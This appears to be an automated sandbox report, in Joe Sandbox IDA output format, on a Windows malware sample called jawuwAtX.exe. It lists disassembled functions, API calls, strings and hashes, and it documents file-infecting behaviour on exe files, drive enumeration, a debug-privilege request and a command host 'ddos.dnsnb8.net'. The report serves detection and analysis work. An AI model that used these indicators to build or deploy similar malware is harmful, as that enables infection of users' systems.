                              • Opcode ID: deb89e8ff0711899d18795bb70803e1c91258e02ca66c7f18457b091c05875d0
                              • Instruction ID: a45dc6f875ee1b733f0a03efb108be6045a9a3b88e0a88ab8a2203dcd4d6ff80
                              • Opcode Fuzzy Hash: deb89e8ff0711899d18795bb70803e1c91258e02ca66c7f18457b091c05875d0
                              • Instruction Fuzzy Hash: 02216275900268BEDB23DBA0FD45FAFBBBCEB15315F114059E601A2050D774AB95CF60
                              Function 00321718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65timeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 216 321718-321733 GetSystemTimeAsFileTime 217 321754-321758 216->217 218 321735-321752 SHSetValueA 216->218 219 3217c6-3217cd 217->219 220 32175a-321784 SHGetValueA 217->220 218->219 220->219 221 321786-3217b3 call 322cf0 * 2 220->221 221->219 226 3217b5 221->226 227 3217b7-3217bd 226->227 228 3217bf 226->228 227->219 227->228 228->219
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321729
                              • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0032174C
                              • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0032177C
                              • __aulldiv.LIBCMT ref: 00321796
                              • __aulldiv.LIBCMT ref: 003217A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: TimeValue__aulldiv$FileSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$SOFTWARE\GTplus$Time
                              • API String ID: 541852442-1543586066
                              • Opcode ID: e11adb3491f0f95f0a3df5d4bdc9a4815edf1bd503c58ea2545f5e8646995b3c
                              • Instruction ID: 5b2a2f493e2909f8aeaa6e6f84e872341133bc66442b0041b51f7c2ea55da70a
                              • Opcode Fuzzy Hash: e11adb3491f0f95f0a3df5d4bdc9a4815edf1bd503c58ea2545f5e8646995b3c
                              • Instruction Fuzzy Hash: E811C871A00329BBDB229B94ED85FEF7BBCEB50B10F108015F900B6140D6749A44CBA0
                              Function 00326076 Relevance: 11.1, APIs: 7, Instructions: 616memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 326076-326079 230 3260e0-3260eb 229->230 231 32607b-326080 229->231 234 3260ee-3260f4 230->234 232 326082-326085 231->232 233 3260f7-3260f8 231->233 235 3260f6 232->235 236 326087 232->236 237 3260fa-3260fc call 3266c8 233->237 238 3260fe-326106 233->238 234->235 235->233 236->234 239 326089-326095 236->239 237->238 241 326155-326189 VirtualFree 238->241 242 326108-32611d 238->242 244 3260a1-3260aa 239->244 245 326097-32609f 239->245 251 32618c-326192 241->251 243 32611f-326121 242->243 247 326123 243->247 248 326151-326154 243->248 249 3260b0-3260c1 VirtualAlloc 244->249 250 3261ba-3261c8 244->250 245->244 247->248 254 326125-326128 247->254 248->241 255 3260c7-3260cf 249->255 252 326243-326251 250->252 253 3261ca-3261d7 250->253 251->255 256 326198-3261b0 VirtualFree 251->256 261 326253 252->261 262 326264-32626f 252->262 257 3261dd-3261e0 253->257 258 326134-32613b 254->258 259 32612a-32612e 254->259 255->251 260 3260d5-3260df VirtualAlloc 255->260 256->250 263 3261b2-3261b4 256->263 257->252 265 3261e2-3261f2 257->265 272 326130-326132 258->272 273 32613d-32614f 258->273 259->258 259->272 260->230 268 326255-326258 261->268 264 326271-326276 262->264 263->250 269 326389-3263b1 VirtualProtect 264->269 270 32627c-326289 264->270 271 3261f5-3261fe 265->271 268->262 274 32625a-326262 268->274 277 3263b7-3263ba 269->277 285 326292-326298 270->285 286 32628b 270->286 275 326200-326203 271->275 276 32620c-326219 271->276 272->243 273->243 274->268 279 326205-326208 275->279 280 32621b-326228 275->280 281 326238-32623f 276->281 282 3263fc-3263ff VirtualProtect 277->282 283 3263bc-3263c2 277->283 287 32622a-326236 279->287 288 32620a 279->288 280->281 281->271 290 326241 281->290 284 326400-326416 282->284 283->283 289 3263c4 283->289 292 326420-326425 284->292 293 326418-32641d 284->293 291 3262a2-3262ac 285->291 286->285 287->281 288->281 289->282 294 3263c6-3263cf 289->294 290->257 295 3262b1-3262c8 291->295 296 3262ae 291->296 297 3263d1 294->297 298 3263d4-3263d8 294->298 299 326373-326384 295->299 300 3262ce-3262d4 295->300 296->295 297->298 301 3263da 298->301 302 3263dd-3263e1 298->302 299->264 305 3262d6-3262d9 300->305 306 3262da-3262f1 300->306 301->302 303 3263e3 302->303 304 3263e7-3263fa VirtualProtect 302->304 303->304 304->277 304->282 305->306 308 3262f3-3262f9 306->308 309 326365-32636e 306->309 310 326314-326326 308->310 311 3262fb-32630f 308->311 309->291 313 326328-32634a 310->313 314 32634c-326360 310->314 312 326426-3264a9 311->312 322 3264ab-3264c0 312->322 323 326519-32651c 312->323 313->309 314->312 329 3264c2 322->329 330 326535-326537 322->330 324 326583-326587 323->324 325 32651d-32651e 323->325 327 326588-32658b 324->327 328 326522-326533 325->328 331 3265a1-3265a3 327->331 332 32658d-32658f 327->332 328->330 335 3264c5-3264cd 329->335 336 3264f8 329->336 333 32659a 330->333 334 326539 330->334 337 326591-326593 332->337 340 32659b-32659d 333->340 338 3265b4 334->338 339 32653b-326541 334->339 341 326542-326545 335->341 342 3264cf-3264d4 335->342 343 3264fa-3264fe 336->343 344 32656c-32656f 336->344 337->340 345 326595 337->345 350 3265be-326608 338->350 339->341 340->337 346 32659f 340->346 347 32654d-326550 341->347 348 3264d6-3264d9 342->348 349 326517-326518 342->349 351 326572 343->351 352 326500 343->352 344->351 345->333 346->327 347->350 353 326552-326556 347->353 348->347 354 3264db-3264f5 348->354 349->323 355 326573-326576 351->355 352->328 356 326502 352->356 358 326578-32657f 353->358 359 326558-326569 353->359 354->336 355->358 356->355 360 326504-326513 356->360 358->324 359->344 360->330 362 326515 360->362 362->349
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 003260BE
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 003260DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00326189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 003261A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0f9f2f4144387320fcb5365edba17eadbf21a8b0d83f013edec13361520e8a96
                              • Instruction ID: c8c7dc427838243386c2da6acfb548648d874becfcfc744e0117d81466a86bd5
                              • Opcode Fuzzy Hash: 0f9f2f4144387320fcb5365edba17eadbf21a8b0d83f013edec13361520e8a96
                              • Instruction Fuzzy Hash: 371244B25087A48FDB338F24DC56BEA3BB4EF02310F1945AED9858B693D774A910C750
                              Function 00322B8C Relevance: 10.6, APIs: 7, Instructions: 74threadstringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 364 322b8c-322bc6 memset GetLogicalDriveStringsA 365 322bc8-322bcc 364->365 366 322c09-322c28 WaitForMultipleObjects 364->366 367 322bfa-322c07 lstrlen 365->367 368 322bce-322bd0 365->368 369 322c2a-322c3a CreateThread 366->369 370 322c3c-322c45 366->370 367->365 367->366 368->367 371 322bd2-322bdc GetDriveTypeA 368->371 369->370 371->367 372 322bde-322be1 371->372 372->367 373 322be3-322bf6 CreateThread 372->373 373->367
                              APIs
                              • memset.MSVCRT ref: 00322BA6
                              • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00322BB4
                              • GetDriveTypeA.KERNEL32(?), ref: 00322BD3
                              • CreateThread.KERNEL32(00000000,00000000,00322B7D,?,00000000,00000000), ref: 00322BEE
                              • lstrlen.KERNEL32(?), ref: 00322BFB
                              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00322C16
                              • CreateThread.KERNEL32(00000000,00000000,00322845,00000000,00000000,00000000), ref: 00322C3A
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                              • String ID:
                              • API String ID: 1073171358-0
                              • Opcode ID: 30abcd0861a099e9bb9242db35d76aebc977873f9928a4c8ecfe9670fbf35adc
                              • Instruction ID: 212f855cd2c7d49d771795fcc826ed24faf2bbebad1ed048408ef709d5f1fae6
                              • Opcode Fuzzy Hash: 30abcd0861a099e9bb9242db35d76aebc977873f9928a4c8ecfe9670fbf35adc
                              • Instruction Fuzzy Hash: BE2190B180016CBFEB329F64BC84DAF7BADFB05354F160129F95292161D7288E06CB71
                              Function 00321E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 321e6e-321e95 call 322d60 3 321e97 call 321d8a 0->3 4 321e9c-321eaa call 321df6 0->4 3->4 8 322332 4->8 9 321eb0-321ed9 SetFileAttributesA CreateFileA 4->9 11 322338-32233b 8->11 9->8 10 321edf-321f28 call 321915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 20 321f2e-321f39 10->20 13 322346-322349 11->13 14 32233d-322340 UnmapViewOfFile 11->14 16 322350-322354 13->16 17 32234b-32234e FindCloseChangeNotification 13->17 14->13 18 322391-32239a call 322d9b 16->18 19 322356-32235b FindCloseChangeNotification 16->19 17->16 19->18 20->8 22 321f3f-321f56 20->22 22->8 24 321f5c-321f64 22->24 24->8 25 321f6a-321f70 24->25 25->8 26 321f76-321f87 call 321c81 25->26 26->8 29 321f8d-321fa7 call 32185b call 321c81 26->29 29->8 34 321fad-321fb4 29->34 35 321fb6-321fc5 call 321af9 34->35 36 322024-322045 34->36 35->36 44 321fc7-321fd2 35->44 36->8 37 32204b-32204e 36->37 39 322070-3220f4 call 321af9 * 2 call 321c68 * 2 memset * 2 37->39 40 322050-322053 37->40 62 3220f5-3220fe 39->62 42 322056-32205a 40->42 42->39 45 32205c-322061 42->45 44->8 47 321fd8-321fe7 44->47 45->8 48 322067-32206e 45->48 50 321fe9-321fec 47->50 51 321fef-322006 call 321af9 47->51 48->42 50->51 57 322013-32201e FlushViewOfFile 51->57 58 322008-32200e call 321c68 51->58 57->36 58->57 63 322130-322139 62->63 64 322100-322114 62->64 67 32213c-322142 63->67 65 322116-32212a 64->65 66 32212d-32212e 64->66 65->66 66->62 68 322144-322150 67->68 69 32215c 67->69 70 322152-322154 68->70 71 322157-32215a 68->71 72 32215f-322162 69->72 70->71 71->67 73 322181-322184 72->73 74 322164-322171 72->74 75 322186 73->75 76 32218d-3221ba call 321c68 73->76 77 322177-32217e 74->77 78 32232a-32232d 74->78 75->76 81 3221d3-32220b call 321c81 call 321c68 76->81 82 3221bc-3221d0 call 321c68 76->82 77->73 78->72 89 32221b-32221e 81->89 90 32220d-322218 call 321c68 81->90 82->81 91 322220-322223 89->91 92 322226-32231a memcpy UnmapViewOfFile CloseHandle call 321b8a call 32185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 321915 89->92 90->89 91->92 100 32231f-322328 CloseHandle 92->100 100->11
                              APIs
                              • SetFileAttributesA.KERNEL32(?,00000080,?,003232B0,00000164,00322986,?), ref: 00321EB9
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00321ECD
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00321EF3
                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00321F07
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00321F1D
                              • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0032201E
                              • memset.MSVCRT ref: 003220D8
                              • memset.MSVCRT ref: 003220EA
                              • memcpy.MSVCRT ref: 0032222D
                              • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00322238
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0032224A
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222C6
                              • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222CB
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222DD
                              • WriteFile.KERNEL32(000000FF,00324008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003222F7
                              • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0032230D
                              • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00322322
                              • UnmapViewOfFile.KERNEL32(?,?,003232B0,00000164,00322986,?), ref: 00322340
                              • FindCloseChangeNotification.KERNEL32(?,?,003232B0,00000164,00322986,?), ref: 0032234E
                              • FindCloseChangeNotification.KERNEL32(000000FF,?,003232B0,00000164,00322986,?), ref: 00322359
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                              • String ID: .@2$5@2$<@2$C@2$m@2
                              • API String ID: 3349749541-162344717
                              • Opcode ID: 85d693554f1dfbf7a8d412237954cfcfbaa8896cd4b320780866c18711159a3d
                              • Instruction ID: afb51e8e0a75125b4ba0e1898cc373da820a4b2da59586a3e8ea368c3e76dded
                              • Opcode Fuzzy Hash: 85d693554f1dfbf7a8d412237954cfcfbaa8896cd4b320780866c18711159a3d
                              • Instruction Fuzzy Hash: 05F18175900228EFCB22DFA4ED80AAEBBB5FF08314F10852DE519AB661D734AD51CF50
                              Function 00321973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144filesleepmemoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 117 321973-32199a PathFileExistsA 118 3219a0-3219aa 117->118 119 321ac7-321acc 117->119 120 3219af-3219c2 CreateFileA 118->120 121 321ad0-321ad5 119->121 122 321ace 119->122 123 3219c4-3219d3 Sleep 120->123 124 321a28-321a36 GetFileSize 120->124 125 321af0-321af6 121->125 126 321ad7-321ad9 121->126 122->121 123->120 127 3219d5-321a0b call 32185b wsprintfA CopyFileA 123->127 128 321a87-321a8b 124->128 129 321a38-321a3b 124->129 126->125 127->124 141 321a0d-321a26 CreateFileA 127->141 130 321a96-321a9a 128->130 131 321a8d-321a90 FindCloseChangeNotification 128->131 129->128 133 321a3d-321a51 VirtualAlloc 129->133 134 321a9c 130->134 135 321aad-321ab1 130->135 131->130 133->128 137 321a53-321a57 133->137 138 321aa0-321aa7 DeleteFileA 134->138 139 321ab3-321ab6 135->139 140 321adb-321ae0 135->140 142 321a80 137->142 143 321a59-321a6d ReadFile 137->143 138->135 139->119 144 321ab8-321ac1 VirtualFree 139->144 146 321ae2-321ae5 140->146 147 321ae7-321aec 140->147 141->124 145 321a9e 141->145 142->128 143->128 148 321a6f-321a7e 143->148 144->119 145->138 146->147 147->125 149 321aee 147->149 148->142 148->143 149->125
                              APIs
                              • PathFileExistsA.SHLWAPI(\N2`N2,00000000,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 00321992
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003219BA
                              • Sleep.KERNEL32(00000064), ref: 003219C6
                              • wsprintfA.USER32 ref: 003219EC
                              • CopyFileA.KERNEL32(?,?,00000000), ref: 00321A00
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321A1E
                              • GetFileSize.KERNEL32(?,00000000), ref: 00321A2C
                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00321A46
                              • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00321A65
                              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00321A90
                              • DeleteFileA.KERNEL32(?), ref: 00321AA7
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00321AC1
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 003219DB
                              • %s%.8X.data, xrefs: 003219E6
                              • \N2`N2, xrefs: 00321980
                              • C:\Users\user\AppData\Local\Temp\jawuwAtX.exe, xrefs: 0032197C
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                              • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$\N2`N2
                              • API String ID: 2523042076-3098686819
                              • Opcode ID: 8f35928885fe19f6c0d2bb4eebe8467a024f2d858035e1cece35d5bd20ac5c9d
                              • Instruction ID: 4e98f2bf33ae05fbb3e34bd65e7fcfdebe009594913d48714a320f5b3beba027
                              • Opcode Fuzzy Hash: 8f35928885fe19f6c0d2bb4eebe8467a024f2d858035e1cece35d5bd20ac5c9d
                              • Instruction Fuzzy Hash: 93518E71D01229EFCB229F98EE84AAEBBBCFB14354F114569F516E6190C3749E41CFA0
                              Function 003228B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 150 3228b8-3228ff memset wsprintfA 151 322905-32290d 150->151 152 3229db-3229df 150->152 151->152 153 322913-322919 151->153 154 322956-322965 strrchr 153->154 155 32291b-32294c memset wsprintfA call 3229e2 153->155 154->152 157 322967-322978 lstrcmpiA 154->157 158 322951 155->158 159 32297a-322981 call 321e6e 157->159 160 322988-322992 lstrcmpiA 157->160 158->152 165 322986 159->165 160->152 161 322994-32299b 160->161 163 3229ad-3229c9 strstr 161->163 164 32299d-3229a3 161->164 167 3229d3-3229d6 call 322692 163->167 168 3229cb-3229d1 call 32239d 163->168 164->163 166 3229a5-3229a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                              APIs
                              • memset.MSVCRT ref: 003228D3
                              • wsprintfA.USER32 ref: 003228F7
                              • memset.MSVCRT ref: 00322925
                              • wsprintfA.USER32 ref: 00322940
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322A02
                                • Part of subcall function 003229E2: wsprintfA.USER32 ref: 00322A1A
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322A44
                                • Part of subcall function 003229E2: lstrlen.KERNEL32(?), ref: 00322A54
                                • Part of subcall function 003229E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00322A6C
                                • Part of subcall function 003229E2: strrchr.MSVCRT ref: 00322A7C
                                • Part of subcall function 003229E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00322A9F
                                • Part of subcall function 003229E2: lstrlen.KERNEL32(Documents and Settings), ref: 00322AAE
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322AC6
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322ADA
                                • Part of subcall function 003229E2: FindFirstFileA.KERNEL32(?,?), ref: 00322AEF
                                • Part of subcall function 003229E2: memset.MSVCRT ref: 00322B13
                              • strrchr.MSVCRT ref: 00322959
                              • lstrcmpiA.KERNEL32(00000001,exe), ref: 00322974
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                              • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                              • API String ID: 3004273771-1791786966
                              • Opcode ID: 4591b88964a60d327e52e39f7677b223e0f715ef112fd91f3f0fac62279cfcf8
                              • Instruction ID: 940710ed7a446602fcbdd468a85a2d0d90ec01551849b417fa8cf689a65ceb02
                              • Opcode Fuzzy Hash: 4591b88964a60d327e52e39f7677b223e0f715ef112fd91f3f0fac62279cfcf8
                              • Instruction Fuzzy Hash: DA31D67294033CBBDB22AB64FC85FDB776C9F10310F050856F545A6080E7B8DAD58BA0
                              Function 00321638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70stringsynchronizationthreadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0032164F
                              • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0032165B
                              • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\jawuwAtX.exe,00000104), ref: 0032166E
                              • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 003216AC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003216BD
                                • Part of subcall function 0032139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 003213BC
                                • Part of subcall function 0032139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003213DA
                                • Part of subcall function 0032139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00321448
                              • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\jawuwAtX.exe), ref: 003216E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jawuwAtX.exe$C:\Windows\system32$Documents and Settings
                              • API String ID: 123563730-2830869553
                              • Opcode ID: 3608838e3643b768e01abcd513e8ca317306df2c0f5d915537f1ba4176ad47ff
                              • Instruction ID: ae66f96ffaa590d015c756da038178dd99aead411041cdfd167ba32ede0870a4
                              • Opcode Fuzzy Hash: 3608838e3643b768e01abcd513e8ca317306df2c0f5d915537f1ba4176ad47ff
                              • Instruction Fuzzy Hash: 3F11B672501234BBCB336BA5BE4DEDB3E6DEB65761F004019F60A950A0C6758942CBB1
                              Function 00321000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 205 321000-321023 CreateFileA 206 321092-321096 205->206 207 321025-321055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 321057-32105f 207->208 209 32107b-321085 207->209 210 321061-32106e call 3217d0 208->210 211 321074-321075 UnmapViewOfFile 208->211 212 321087-32108b CloseHandle 209->212 213 32108d-321091 CloseHandle 209->213 210->211 211->209 212->213 213->206
                              APIs
                              • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG2,http://%s:%d/%s/%s,003210E8,?), ref: 00321018
                              • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400), ref: 00321029
                              • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00321038
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0032104B
                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00321075
                              • CloseHandle.KERNEL32(?), ref: 0032108B
                              • CloseHandle.KERNEL32(00000000), ref: 0032108E
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                              • String ID: HG2$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1223616889-1867649725
                              • Opcode ID: f86b473c1f5a289d7981817a9fa99fa68263759babc4bc281a1cd033b3dff3f7
                              • Instruction ID: cffc1866f63e24fec1dde6a4af2ed757c41e267a1a813a53d1d6eeabb3abfd9e
                              • Opcode Fuzzy Hash: f86b473c1f5a289d7981817a9fa99fa68263759babc4bc281a1cd033b3dff3f7
                              • Instruction Fuzzy Hash: 220196B160035CBFE7325F60AD88E2BBBACEB44799F01852DF245A2090D7745E458B71
                              Function 00322C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
